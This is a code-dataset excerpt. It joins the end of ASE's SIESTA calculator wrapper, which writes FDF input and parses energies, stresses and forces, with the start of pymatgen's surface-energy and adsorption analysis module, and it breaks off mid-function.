locals = {'label': self.label}
execfile(siesta, {}, locals)
exitcode = locals['exitcode']
if exitcode != 0:
raise RuntimeError(('Siesta exited with exit code: %d. ' +
'Check %s.txt for more information.') %
(exitcode, self.label))
self.read()
self.converged = True
def set_fdf(self, key, value):
"""Set FDF parameter."""
self.fdf[key] = value
def write_fdf(self, atoms):
"""Write input parameters to fdf-file."""
fh = open(self.label + '.fdf', 'w')
fdf = {
'SystemLabel': self.label,
'AtomicCoordinatesFormat': 'Ang',
'LatticeConstant': 1.0,
'NumberOfAtoms': len(atoms),
'MeshCutoff': self.meshcutoff,
'NetCharge': self.charge,
'ElectronicTemperature': self.width,
'NumberOfEigenStates': self.nbands,
'DM.UseSaveDM': self.converged,
'PAO.BasisSize': self.basis,
'SolutionMethod': 'diagon',
'DM.NumberPulay': self.pulay,
'DM.MixingWeight': self.mix,
'MaxSCFIterations' : self.maxiter
}
if self.xc != 'LDA':
fdf['xc.functional'] = 'GGA'
fdf['xc.authors'] = self.xc
magmoms = atoms.get_initial_magnetic_moments()
if magmoms.any():
fdf['SpinPolarized'] = True
fh.write('%block InitSpin\n')
for n, M in enumerate(magmoms):
if M != 0:
fh.write('%d %.14f\n' % (n + 1, M))
fh.write('%endblock InitSpin\n')
fdf['Number_of_species'] = len(self.species)
fdf.update(self.fdf)
for key, value in fdf.items():
if value is None:
continue
if isinstance(value, list):
fh.write('%%block %s\n' % key)
for line in value:
fh.write(line + '\n')
fh.write('%%endblock %s\n' % key)
else:
unit = keys_with_units.get(fdfify(key))
if unit is None:
fh.write('%s %s\n' % (key, value))
else:
if 'fs**2' in unit:
value /= fs**2
elif 'fs' in unit:
value /= fs
fh.write('%s %f %s\n' % (key, value, unit))
fh.write('%block LatticeVectors\n')
for v in self.cell:
fh.write('%.14f %.14f %.14f\n' % tuple(v))
fh.write('%endblock LatticeVectors\n')
fh.write('%block Chemical_Species_label\n')
for n, Z in enumerate(self.species):
fh.write('%d %s %s\n' % (n + 1, Z, chemical_symbols[abs(Z)]))
fh.write('%endblock Chemical_Species_label\n')
fh.write('%block AtomicCoordinatesAndAtomicSpecies\n')
a = 0
for pos, Z in zip(self.positions, self.numbers):
if a in self.ghosts:
Z = -Z
a += 1
fh.write('%.14f %.14f %.14f' % tuple(pos))
fh.write(' %d\n' % (self.species.index(Z) + 1))
fh.write('%endblock AtomicCoordinatesAndAtomicSpecies\n')
if self.kpts is not None:
fh.write('%block kgrid_Monkhorst_Pack\n')
for i in range(3):
for j in range(3):
if i == j:
fh.write('%d ' % self.kpts[i])
else:
fh.write('0 ')
fh.write('%.1f\n' % (((self.kpts[i] + 1) % 2) * 0.5))
fh.write('%endblock kgrid_Monkhorst_Pack\n')
fh.close()
def read(self):
"""Read results from SIESTA's text-output file."""
text = open(self.label + '.txt', 'r').read().lower()
assert 'error' not in text
lines = iter(text.split('\n'))
# Get the number of grid points used:
for line in lines:
if line.startswith('initmesh: mesh ='):
self.grid = [int(word) for word in line.split()[3:8:2]]
break
# Stress:
for line in lines:
if line.startswith('siesta: stress tensor (total) (ev/ang**3):'):
self.stress = np.empty((3, 3))
for i in range(3):
self.stress[i] = [float(word)
for word in lines.next().split()]
break
else:
raise RuntimeError
# Energy:
for line in lines:
if line.startswith('siesta: etot ='):
self.etotal = float(line.split()[-1])
self.efree = float(lines.next().split()[-1])
break
else:
raise RuntimeError
# Forces:
lines = open(self.label + '.FA', 'r').readlines()
assert int(lines[0]) == len(self.numbers)
assert len(lines) == len(self.numbers) + 1
self.forces = np.array([[float(word)
for word in line.split()[1:4]]
for line in lines[1:]])
def fdfify(key):
return key.lower().replace('_', '').replace('.', '').replace('-', '')
keys_with_units = {
'paoenergyshift': 'eV',
'zmunitslength': 'Bohr',
'zmunitsangle': 'rad',
'zmforcetollength': 'eV/Ang',
'zmforcetolangle': 'eV/rad',
'zmmaxdispllength': 'Ang',
'zmmaxdisplangle': 'rad',
'meshcutoff': 'eV',
'dmenergytolerance': 'eV',
'electronictemperature': 'eV',
'oneta': 'eV',
'onetaalpha': 'eV',
'onetabeta': 'eV',
'onrclwf': 'Ang',
'onchemicalpotentialrc': 'Ang',
'onchemicalpotentialtemperature': 'eV',
'mdmaxcgdispl': 'Ang',
'mdmaxforcetol': 'eV/Ang',
'mdmaxstresstol': 'eV/Ang**3',
'mdlengthtimestep': 'fs',
'mdinitialtemperature': 'eV',
'mdtargettemperature': 'eV',
'mdtargetpressure': 'eV/Ang**3',
'mdnosemass': 'eV*fs**2',
'mdparrinellorahmanmass': 'eV*fs**2',
'mdtaurelax': 'fs',
'mdbulkmodulus': 'eV/Ang**3',
'mdfcdispl': 'Ang',
'warningminimumatomicdistance': 'Ang',
'rcspatial': 'Ang',
'kgridcutoff': 'Ang',
'latticeconstant': 'Ang'}
|
freephys/python_ase
|
ase/calculators/siesta.py
|
Python
|
gpl-3.0
| 11,417
|
[
"ASE",
"SIESTA"
] |
ecb84f096f597b482ca45ce3dad786cb5dc6b48607ca53ab9601e375887a6ba3
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
TODO:
-Still assumes individual elements have their own chempots
in a molecular adsorbate instead of considering a single
chempot for a single molecular adsorbate. E.g. for an OH
adsorbate, the surface energy is a function of delu_O and
delu_H instead of delu_OH
-Need a method to automatically get chempot range when
dealing with non-stoichiometric slabs
-Simplify the input for SurfaceEnergyPlotter such that the
user does not need to generate a dict
"""
import numpy as np
import itertools
import warnings
import random, copy
from sympy import Symbol, Number
from sympy.solvers import linsolve, solve
from pymatgen.core.composition import Composition
from pymatgen import Structure
from pymatgen.core.surface import get_slab_regions
from pymatgen.entries.computed_entries import ComputedStructureEntry
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
from pymatgen.analysis.wulff import WulffShape
from pymatgen.util.plotting import pretty_plot
from pymatgen.io.vasp.outputs import Outcar, Locpot, Poscar
EV_PER_ANG2_TO_JOULES_PER_M2 = 16.0217656
__author__ = "Richard Tran"
__copyright__ = "Copyright 2017, The Materials Virtual Lab"
__version__ = "0.2"
__maintainer__ = "Richard Tran"
__credits__ = "Joseph Montoya, Xianguo Li"
__email__ = "rit001@eng.ucsd.edu"
__date__ = "8/24/17"
"""
This module defines tools to analyze surface and adsorption related
quantities as well as related plots. If you use this module, please
consider citing the following works::
R. Tran, Z. Xu, B. Radhakrishnan, D. Winston, W. Sun, K. A. Persson,
S. P. Ong, "Surface Energies of Elemental Crystals", Scientific
Data, 2016, 3:160080, doi: 10.1038/sdata.2016.80.
and
Kang, S., Mo, Y., Ong, S. P., & Ceder, G. (2014). Nanoscale
stabilization of sodium oxides: Implications for Na-O2 batteries.
Nano Letters, 14(2), 1016–1020. https://doi.org/10.1021/nl404557w
and
Montoya, J. H., & Persson, K. A. (2017). A high-throughput framework
for determining adsorption energies on solid surfaces. Npj
Computational Materials, 3(1), 14.
https://doi.org/10.1038/s41524-017-0017-z
"""
class SlabEntry(ComputedStructureEntry):
"""
A ComputedStructureEntry object encompassing all data relevant to a
slab for analyzing surface thermodynamics.
.. attribute:: miller_index
Miller index of plane parallel to surface.
.. attribute:: label
Brief description for this slab.
.. attribute:: adsorbates
List of ComputedStructureEntry for the types of adsorbates
..attribute:: clean_entry
SlabEntry for the corresponding clean slab for an adsorbed slab
..attribute:: ads_entries_dict
Dictionary where the key is the reduced composition of the
adsorbate entry and value is the entry itself
"""
def __init__(self, structure, energy, miller_index, correction=0.0,
parameters=None, data=None, entry_id=None, label=None,
adsorbates=None, clean_entry=None, marker=None, color=None):
"""
Make a SlabEntry containing all relevant surface thermodynamics data.
Args:
structure (Slab): The primary slab associated with this entry.
energy (float): Energy from total energy calculation
miller_index (tuple(h, k, l)): Miller index of plane parallel
to surface
correction (float): See ComputedSlabEntry
parameters (dict): See ComputedSlabEntry
data (dict): See ComputedSlabEntry
entry_id (obj): See ComputedSlabEntry
data (dict): See ComputedSlabEntry
entry_id (str): See ComputedSlabEntry
label (str): Any particular label for this slab, e.g. "Tasker 2",
"non-stoichiometric", "reconstructed"
adsorbates ([ComputedStructureEntry]): List of reference entries
for the adsorbates on the slab, can be an isolated molecule
(e.g. O2 for O or O2 adsorption), a bulk structure (eg. fcc
Cu for Cu adsorption) or anything.
clean_entry (ComputedStructureEntry): If the SlabEntry is for an
adsorbed slab, this is the corresponding SlabEntry for the
clean slab
marker (str): Custom marker for gamma plots ("--" and "-" are typical)
color (str or rgba): Custom color for gamma plots
"""
self.miller_index = miller_index
self.label = label
self.adsorbates = [] if not adsorbates else adsorbates
self.clean_entry = clean_entry
self.ads_entries_dict = {str(list(ads.composition.as_dict().keys())[0]): \
ads for ads in self.adsorbates}
self.mark = marker
self.color = color
super(SlabEntry, self).__init__(
structure, energy, correction=correction,
parameters=parameters, data=data, entry_id=entry_id)
def as_dict(self):
"""
Returns dict which contains Slab Entry data.
"""
d = {"@module": self.__class__.__module__,
"@class": self.__class__.__name__}
d["structure"] = self.structure
d["energy"] = self.energy
d["miller_index"] = self.miller_index
d["label"] = self.label
d["coverage"] = self.coverage
d["adsorbates"] = self.adsorbates
d["clean_entry"] = self.clean_entry
return d
def gibbs_binding_energy(self, eads=False):
"""
Returns the adsorption energy or Gibb's binding energy
of an adsorbate on a surface
Args:
eads (bool): Whether to calculate the adsorption energy
(True) or the binding energy (False) which is just
adsorption energy normalized by number of adsorbates.
"""
n = self.get_unit_primitive_area
Nads = self.Nads_in_slab
BE = (self.energy - n * self.clean_entry.energy) / Nads - \
sum([ads.energy_per_atom for ads in self.adsorbates])
return BE * Nads if eads else BE
def surface_energy(self, ucell_entry, ref_entries=None):
"""
Calculates the surface energy of this SlabEntry.
Args:
ucell_entry (entry): An entry object for the bulk
ref_entries (list: [entry]): A list of entries for each type
of element to be used as a reservoir for nonstoichiometric
systems. The length of this list MUST be n-1 where n is the
number of different elements in the bulk entry. The chempot
of the element ref_entry that is not in the list will be
treated as a variable.
Returns (Add (Sympy class)): Surface energy
"""
# Set up
ref_entries = [] if not ref_entries else ref_entries
# Check if appropriate ref_entries are present if the slab is non-stoichiometric
# TODO: There should be a way to identify which specific species are
# non-stoichiometric relative to the others in systems with more than 2 species
slab_comp = self.composition.as_dict()
ucell_entry_comp = ucell_entry.composition.reduced_composition.as_dict()
slab_clean_comp = Composition({el: slab_comp[el] for el in ucell_entry_comp.keys()})
if slab_clean_comp.reduced_composition != ucell_entry.composition.reduced_composition:
list_els = [list(entry.composition.as_dict().keys())[0] for entry in ref_entries]
if not any([el in list_els for el in ucell_entry.composition.as_dict().keys()]):
warnings.warn("Elemental references missing for the non-dopant species.")
gamma = (Symbol("E_surf") - Symbol("Ebulk")) / (2 * Symbol("A"))
ucell_comp = ucell_entry.composition
ucell_reduced_comp = ucell_comp.reduced_composition
ref_entries_dict = {str(list(ref.composition.as_dict().keys())[0]): \
ref for ref in ref_entries}
ref_entries_dict.update(self.ads_entries_dict)
# Calculate Gibbs free energy of the bulk per unit formula
gbulk = ucell_entry.energy / \
ucell_comp.get_integer_formula_and_factor()[1]
# First we get the contribution to the bulk energy
# from each element with an existing ref_entry.
bulk_energy, gbulk_eqn = 0, 0
for el, ref in ref_entries_dict.items():
N, delu = self.composition.as_dict()[el], Symbol("delu_" + str(el))
if el in ucell_comp.as_dict().keys():
gbulk_eqn += ucell_reduced_comp[el] * (delu + ref.energy_per_atom)
bulk_energy += N * (Symbol("delu_" + el) + ref.energy_per_atom)
# Next, we add the contribution to the bulk energy from
# the variable element (the element without a ref_entry),
# as a function of the other elements
for ref_el in ucell_comp.as_dict().keys():
if str(ref_el) not in ref_entries_dict.keys():
break
refEperA = (gbulk - gbulk_eqn) / ucell_reduced_comp.as_dict()[ref_el]
bulk_energy += self.composition.as_dict()[ref_el] * refEperA
se = gamma.subs({Symbol("E_surf"): self.energy, Symbol("Ebulk"): bulk_energy,
Symbol("A"): self.surface_area})
return float(se) if type(se).__name__ == "Float" else se
@property
def get_unit_primitive_area(self):
"""
Returns the surface area of the adsorbed system per
unit area of the primitive slab system.
"""
A_ads = self.surface_area
A_clean = self.clean_entry.surface_area
n = (A_ads / A_clean)
return n
@property
def get_monolayer(self):
"""
Returns the primitive unit surface area density of the
adsorbate.
"""
unit_a = self.get_unit_primitive_area
Nsurfs = self.Nsurfs_ads_in_slab
Nads = self.Nads_in_slab
return Nads / (unit_a * Nsurfs)
@property
def Nads_in_slab(self):
"""
Returns the TOTAL number of adsorbates in the slab on BOTH sides
"""
return sum([self.composition.as_dict()[a] for a \
in self.ads_entries_dict.keys()])
@property
def Nsurfs_ads_in_slab(self):
"""
Returns the TOTAL number of adsorbed surfaces in the slab
"""
struct = self.structure
weights = [s.species.weight for s in struct]
center_of_mass = np.average(struct.frac_coords,
weights=weights, axis=0)
Nsurfs = 0
# Are there adsorbates on top surface?
if any([site.species_string in self.ads_entries_dict.keys() for \
site in struct if site.frac_coords[2] > center_of_mass[2]]):
Nsurfs += 1
# Are there adsorbates on bottom surface?
if any([site.species_string in self.ads_entries_dict.keys() for \
site in struct if site.frac_coords[2] < center_of_mass[2]]):
Nsurfs += 1
return Nsurfs
@classmethod
def from_dict(cls, d):
"""
Returns a SlabEntry by reading in an dictionary
"""
structure = SlabEntry.from_dict(d["structure"])
energy = SlabEntry.from_dict(d["energy"])
miller_index = d["miller_index"]
label = d["label"]
coverage = d["coverage"]
adsorbates = d["adsorbates"]
clean_entry = d["clean_entry"] = self.clean_entry
return SlabEntry(structure, energy, miller_index, label=label,
coverage=coverage, adsorbates=adsorbates,
clean_entry=clean_entry)
@property
def surface_area(self):
"""
Calculates the surface area of the slab
"""
m = self.structure.lattice.matrix
return np.linalg.norm(np.cross(m[0], m[1]))
@property
def cleaned_up_slab(self):
"""
Returns a slab with the adsorbates removed
"""
ads_strs = list(self.ads_entries_dict.keys())
cleaned = self.structure.copy()
cleaned.remove_species(ads_strs)
return cleaned
@property
def create_slab_label(self):
"""
Returns a label (str) for this particular slab based
on composition, coverage and Miller index.
"""
if "label" in self.data.keys():
return self.data["label"]
label = str(self.miller_index)
ads_strs = list(self.ads_entries_dict.keys())
cleaned = self.cleaned_up_slab
label += " %s" % (cleaned.composition.reduced_composition)
if self.adsorbates:
for ads in ads_strs:
label += r"+%s" % (ads)
label += r", %.3f ML" % (self.get_monolayer)
return label
@staticmethod
def from_computed_structure_entry(entry, miller_index, label=None,
adsorbates=None, clean_entry=None, **kwargs):
"""
Returns SlabEntry from a ComputedStructureEntry
"""
return SlabEntry(entry.structure, entry.energy, miller_index, label=label,
adsorbates=adsorbates, clean_entry=clean_entry, **kwargs)
class SurfaceEnergyPlotter:
"""
A class used for generating plots to analyze the thermodynamics of surfaces
of a material. Produces stability maps of different slab configurations,
phases diagrams of two parameters to determine stability of configurations
(future release), and Wulff shapes.
.. attribute:: all_slab_entries
Either a list of SlabEntry objects (note for a list, the SlabEntry must
have the adsorbates and clean_entry parameter pulgged in) or a Nested
dictionary containing a list of entries for slab calculations as
items and the corresponding Miller index of the slab as the key.
To account for adsorption, each value is a sub-dictionary with the
entry of a clean slab calculation as the sub-key and a list of
entries for adsorption calculations as the sub-value. The sub-value
can contain different adsorption configurations such as a different
site or a different coverage, however, ordinarily only the most stable
configuration for a particular coverage will be considered as the
function of the adsorbed surface energy has an intercept dependent on
the adsorption energy (ie an adsorption site with a higher adsorption
energy will always provide a higher surface energy than a site with a
lower adsorption energy). An example parameter is provided:
{(h1,k1,l1): {clean_entry1: [ads_entry1, ads_entry2, ...],
clean_entry2: [...], ...}, (h2,k2,l2): {...}}
where clean_entry1 can be a pristine surface and clean_entry2 can be a
reconstructed surface while ads_entry1 can be adsorption at site 1 with
a 2x2 coverage while ads_entry2 can have a 3x3 coverage. If adsorption
entries are present (i.e. if all_slab_entries[(h,k,l)][clean_entry1]), we
consider adsorption in all plots and analysis for this particular facet.
..attribute:: color_dict
Dictionary of colors (r,g,b,a) when plotting surface energy stability. The
keys are individual surface entries where clean surfaces have a solid
color while the corresponding adsorbed surface will be transparent.
.. attribute:: ucell_entry
ComputedStructureEntry of the bulk reference for this particular material.
.. attribute:: ref_entries
List of ComputedStructureEntries to be used for calculating chemical potential.
.. attribute:: color_dict
Randomly generated dictionary of colors associated with each facet.
"""
def __init__(self, all_slab_entries, ucell_entry, ref_entries=None):
"""
Object for plotting surface energy in different ways for clean and
adsorbed surfaces.
Args:
all_slab_entries (dict or list): Dictionary or list containing
all entries for slab calculations. See attributes.
ucell_entry (ComputedStructureEntry): ComputedStructureEntry
of the bulk reference for this particular material.
ref_entries ([ComputedStructureEntries]): A list of entries for
each type of element to be used as a reservoir for
nonstoichiometric systems. The length of this list MUST be
n-1 where n is the number of different elements in the bulk
entry. The bulk energy term in the grand surface potential can
be defined by a summation of the chemical potentials for each
element in the system. As the bulk energy is already provided,
one can solve for one of the chemical potentials as a function
of the other chemical potetinals and bulk energy. i.e. there
are n-1 variables (chempots). e.g. if your ucell_entry is for
LiFePO4 than your ref_entries should have an entry for Li, Fe,
and P if you want to use the chempot of O as the variable.
"""
self.ucell_entry = ucell_entry
self.ref_entries = ref_entries
self.all_slab_entries = all_slab_entries if \
type(all_slab_entries).__name__ == "dict" else \
entry_dict_from_list(all_slab_entries)
self.color_dict = self.color_palette_dict()
se_dict, as_coeffs_dict = {}, {}
for hkl in self.all_slab_entries.keys():
for clean in self.all_slab_entries[hkl].keys():
se = clean.surface_energy(self.ucell_entry, ref_entries=self.ref_entries)
if type(se).__name__ == "float":
se_dict[clean] = se
as_coeffs_dict[clean] = {1: se}
else:
se_dict[clean] = se
as_coeffs_dict[clean] = se.as_coefficients_dict()
for dope in self.all_slab_entries[hkl][clean]:
se = dope.surface_energy(self.ucell_entry, ref_entries=self.ref_entries)
if type(se).__name__ == "float":
se_dict[dope] = se
as_coeffs_dict[dope] = {1: se}
else:
se_dict[dope] = se
as_coeffs_dict[dope] = se.as_coefficients_dict()
self.surfe_dict = se_dict
self.as_coeffs_dict = as_coeffs_dict
list_of_chempots = []
for k in self.as_coeffs_dict.keys():
if type(self.as_coeffs_dict[k]).__name__ == "float":
continue
for du in self.as_coeffs_dict[k].keys():
if du not in list_of_chempots:
list_of_chempots.append(du)
self.list_of_chempots = list_of_chempots
def get_stable_entry_at_u(self, miller_index, delu_dict=None, delu_default=0,
no_doped=False, no_clean=False):
"""
Returns the entry corresponding to the most stable slab for a particular
facet at a specific chempot. We assume that surface energy is constant
so all free variables must be set with delu_dict, otherwise they are
assumed to be equal to delu_default.
Args:
miller_index ((h,k,l)): The facet to find the most stable slab in
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
no_doped (bool): Consider stability of clean slabs only.
no_clean (bool): Consider stability of doped slabs only.
Returns:
SlabEntry, surface_energy (float)
"""
all_delu_dict = self.set_all_variables(delu_dict, delu_default)
def get_coeffs(e):
coeffs = []
for du in all_delu_dict.keys():
if type(self.as_coeffs_dict[e]).__name__ == 'float':
coeffs.append(self.as_coeffs_dict[e])
elif du in self.as_coeffs_dict[e].keys():
coeffs.append(self.as_coeffs_dict[e][du])
else:
coeffs.append(0)
return np.array(coeffs)
all_entries, all_coeffs = [], []
for entry in self.all_slab_entries[miller_index].keys():
if not no_clean:
all_entries.append(entry)
all_coeffs.append(get_coeffs(entry))
if not no_doped:
for ads_entry in self.all_slab_entries[miller_index][entry]:
all_entries.append(ads_entry)
all_coeffs.append(get_coeffs(ads_entry))
du_vals = np.array(list(all_delu_dict.values()))
all_gamma = list(np.dot(all_coeffs, du_vals.T))
return all_entries[all_gamma.index(min(all_gamma))], float(min(all_gamma))
def wulff_from_chempot(self, delu_dict=None, delu_default=0, symprec=1e-5,
no_clean=False, no_doped=False):
"""
Method to get the Wulff shape at a specific chemical potential.
Args:
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
symprec (float): See WulffShape.
no_doped (bool): Consider stability of clean slabs only.
no_clean (bool): Consider stability of doped slabs only.
Returns:
(WulffShape): The WulffShape at u_ref and u_ads.
"""
latt = SpacegroupAnalyzer(self.ucell_entry.structure). \
get_conventional_standard_structure().lattice
miller_list = self.all_slab_entries.keys()
e_surf_list = []
for hkl in miller_list:
# For all configurations, calculate surface energy as a
# function of u. Use the lowest surface energy (corresponds
# to the most stable slab termination at that particular u)
gamma = self.get_stable_entry_at_u(hkl, delu_dict=delu_dict,
delu_default=delu_default,
no_clean=no_clean,
no_doped=no_doped)[1]
e_surf_list.append(gamma)
return WulffShape(latt, miller_list, e_surf_list, symprec=symprec)
def area_frac_vs_chempot_plot(self, ref_delu, chempot_range, delu_dict=None,
delu_default=0, increments=10, no_clean=False, no_doped=False):
"""
1D plot. Plots the change in the area contribution
of each facet as a function of chemical potential.
Args:
ref_delu (sympy Symbol): The free variable chempot with the format:
Symbol("delu_el") where el is the name of the element.
chempot_range (list): Min/max range of chemical potential to plot along
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
increments (int): Number of data points between min/max or point
of intersection. Defaults to 10 points.
Returns:
(Pylab): Plot of area frac on the Wulff shape
for each facet vs chemical potential.
"""
delu_dict = delu_dict if delu_dict else {}
chempot_range = sorted(chempot_range)
all_chempots = np.linspace(min(chempot_range), max(chempot_range),
increments)
# initialize a dictionary of lists of fractional areas for each hkl
hkl_area_dict = {}
for hkl in self.all_slab_entries.keys():
hkl_area_dict[hkl] = []
# Get plot points for each Miller index
for u in all_chempots:
delu_dict[ref_delu] = u
wulffshape = self.wulff_from_chempot(delu_dict=delu_dict, no_clean=no_clean,
no_doped=no_doped, delu_default=delu_default)
for hkl in wulffshape.area_fraction_dict.keys():
hkl_area_dict[hkl].append(wulffshape.area_fraction_dict[hkl])
# Plot the area fraction vs chemical potential for each facet
plt = pretty_plot(width=8, height=7)
axes = plt.gca()
for hkl in self.all_slab_entries.keys():
clean_entry = list(self.all_slab_entries[hkl].keys())[0]
# Ignore any facets that never show up on the
# Wulff shape regardless of chemical potential
if all([a == 0 for a in hkl_area_dict[hkl]]):
continue
else:
plt.plot(all_chempots, hkl_area_dict[hkl],
'--', color=self.color_dict[clean_entry],
label=str(hkl))
# Make the figure look nice
plt.ylabel(r"Fractional area $A^{Wulff}_{hkl}/A^{Wulff}$")
self.chempot_plot_addons(plt, chempot_range, str(ref_delu).split("_")[1],
axes, rect=[-0.0, 0, 0.95, 1], pad=5, ylim=[0, 1])
return plt
def get_surface_equilibrium(self, slab_entries, delu_dict=None):
"""
Takes in a list of SlabEntries and calculates the chemical potentials
at which all slabs in the list coexists simultaneously. Useful for
building surface phase diagrams. Note that to solve for x equations
(x slab_entries), there must be x free variables (chemical potentials).
Adjust delu_dict as need be to get the correct number of free variables.
Args:
slab_entries (array): The coefficients of the first equation
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
Returns:
(array): Array containing a solution to x equations with x
variables (x-1 chemical potential and 1 surface energy)
"""
# Generate all possible coefficients
all_parameters = []
all_eqns = []
for slab_entry in slab_entries:
se = self.surfe_dict[slab_entry]
# remove the free chempots we wish to keep constant and
# set the equation to 0 (subtract gamma from both sides)
if type(se).__name__ == "float":
all_eqns.append(se - Symbol("gamma"))
else:
se = sub_chempots(se, delu_dict) if delu_dict else se
all_eqns.append(se - Symbol("gamma"))
all_parameters.extend([p for p in list(se.free_symbols)
if p not in all_parameters])
all_parameters.append(Symbol("gamma"))
# Now solve the system of linear eqns to find the chempot
# where the slabs are at equilibrium with each other
soln = linsolve(all_eqns, all_parameters)
if not soln:
warnings.warn("No solution")
return soln
return {p: list(soln)[0][i] for i, p in enumerate(all_parameters)}
def stable_u_range_dict(self, chempot_range, ref_delu, no_doped=True,
no_clean=False, delu_dict={}, miller_index=(),
dmu_at_0=False, return_se_dict=False):
"""
Creates a dictionary where each entry is a key pointing to a
chemical potential range where the surface of that entry is stable.
Does so by enumerating through all possible solutions (intersect)
for surface energies of a specific facet.
Args:
chempot_range ([max_chempot, min_chempot]): Range to consider the
stability of the slabs.
ref_delu (sympy Symbol): The range stability of each slab is based
on the chempot range of this chempot. Should be a sympy Symbol
object of the format: Symbol("delu_el") where el is the name of
the element
no_doped (bool): Consider stability of clean slabs only.
no_clean (bool): Consider stability of doped slabs only.
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
miller_index (list): Miller index for a specific facet to get a
dictionary for.
dmu_at_0 (bool): If True, if the surface energies corresponding to
the chemical potential range is between a negative and positive
value, the value is a list of three chemical potentials with the
one in the center corresponding a surface energy of 0. Uselful
in identifying unphysical ranges of surface energies and their
chemical potential range.
return_se_dict (bool): Whether or not to return the corresponding
dictionary of surface energies
"""
chempot_range = sorted(chempot_range)
stable_urange_dict, se_dict = {}, {}
# Get all entries for a specific facet
for hkl in self.all_slab_entries.keys():
entries_in_hkl = []
# Skip this facet if this is not the facet we want
if miller_index and hkl != tuple(miller_index):
continue
if not no_clean:
entries_in_hkl.extend([clean for clean in self.all_slab_entries[hkl]])
if not no_doped:
for entry in self.all_slab_entries[hkl]:
entries_in_hkl.extend([ads_entry for ads_entry in
self.all_slab_entries[hkl][entry]])
for entry in entries_in_hkl:
stable_urange_dict[entry] = []
se_dict[entry] = []
# if there is only one entry for this facet, then just give it the
# default urange, you can't make combinations with just 1 item
if len(entries_in_hkl) == 1:
stable_urange_dict[entries_in_hkl[0]] = chempot_range
u1, u2 = delu_dict.copy(), delu_dict.copy()
u1[ref_delu], u2[ref_delu] = chempot_range[0], chempot_range[1]
se = self.as_coeffs_dict[entries_in_hkl[0]]
se_dict[entries_in_hkl[0]] = [sub_chempots(se, u1), sub_chempots(se, u2)]
continue
for pair in itertools.combinations(entries_in_hkl, 2):
# I'm assuming ref_delu was not set in delu_dict,
# so the solution should be for ref_delu
solution = self.get_surface_equilibrium(pair, delu_dict=delu_dict)
# Check if this solution is stable
if not solution:
continue
new_delu_dict = delu_dict.copy()
new_delu_dict[ref_delu] = solution[ref_delu]
stable_entry, gamma = self.get_stable_entry_at_u(hkl, new_delu_dict,
no_doped=no_doped,
no_clean=no_clean)
if stable_entry not in pair:
continue
# Now check if the solution is within the chempot range
if not (chempot_range[0] <= solution[ref_delu] <= chempot_range[1]):
continue
for entry in pair:
stable_urange_dict[entry].append(solution[ref_delu])
se_dict[entry].append(gamma)
# Now check if all entries have 2 chempot values. If only
# one, we need to set the other value as either the upper
# limit or lower limit of the user provided chempot_range
new_delu_dict = delu_dict.copy()
for u in chempot_range:
new_delu_dict[ref_delu] = u
entry, gamma = self.get_stable_entry_at_u(hkl, delu_dict=new_delu_dict,
no_doped=no_doped,
no_clean=no_clean)
stable_urange_dict[entry].append(u)
se_dict[entry].append(gamma)
if dmu_at_0:
for entry in se_dict.keys():
# if se are of opposite sign, determine chempot when se=0.
# Useful for finding a chempot range where se is unphysical
if not stable_urange_dict[entry]:
continue
if se_dict[entry][0] * se_dict[entry][1] < 0:
# solve for gamma=0
se = self.as_coeffs_dict[entry]
se_dict[entry].append(0)
stable_urange_dict[entry].append(solve(sub_chempots(se, delu_dict),
ref_delu)[0])
# sort the chempot ranges for each facet
for entry in stable_urange_dict.keys():
se_dict[entry] = [se for i, se in sorted(zip(stable_urange_dict[entry],
se_dict[entry]))]
stable_urange_dict[entry] = sorted(stable_urange_dict[entry])
if return_se_dict:
return stable_urange_dict, se_dict
else:
return stable_urange_dict
def color_palette_dict(self, alpha=0.35):
"""
Helper function to assign each facet a unique color using a dictionary.
Args:
alpha (float): Degree of transparency
return (dict): Dictionary of colors (r,g,b,a) when plotting surface
energy stability. The keys are individual surface entries where
clean surfaces have a solid color while the corresponding adsorbed
surface will be transparent.
"""
color_dict = {}
for hkl in self.all_slab_entries.keys():
rgb_indices = [0, 1, 2]
color = [0, 0, 0, 1]
random.shuffle(rgb_indices)
for i, ind in enumerate(rgb_indices):
if i == 2:
break
color[ind] = np.random.uniform(0, 1)
# Get the clean (solid) colors first
clean_list = np.linspace(0, 1, len(self.all_slab_entries[hkl]))
for i, clean in enumerate(self.all_slab_entries[hkl].keys()):
c = copy.copy(color)
c[rgb_indices[2]] = clean_list[i]
color_dict[clean] = c
# Now get the adsorbed (transparent) colors
for ads_entry in self.all_slab_entries[hkl][clean]:
c_ads = copy.copy(c)
c_ads[3] = alpha
color_dict[ads_entry] = c_ads
return color_dict
def chempot_vs_gamma_plot_one(self, plt, entry, ref_delu, chempot_range,
delu_dict={}, delu_default=0, label='', JPERM2=False):
"""
Helper function to help plot the surface energy of a
single SlabEntry as a function of chemical potential.
Args:
plt (Plot): A plot.
entry (SlabEntry): Entry of the slab whose surface energy we want
to plot
ref_delu (sympy Symbol): The range stability of each slab is based
on the chempot range of this chempot. Should be a sympy Symbol
object of the format: Symbol("delu_el") where el is the name of
the element
chempot_range ([max_chempot, min_chempot]): Range to consider the
stability of the slabs.
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
label (str): Label of the slab for the legend.
JPERM2 (bool): Whether to plot surface energy in /m^2 (True) or
eV/A^2 (False)
Returns:
(Plot): Plot of surface energy vs chemical potential for one entry.
"""
chempot_range = sorted(chempot_range)
# use dashed lines for slabs that are not stoichiometric
# wrt bulk. Label with formula if nonstoichiometric
ucell_comp = self.ucell_entry.composition.reduced_composition
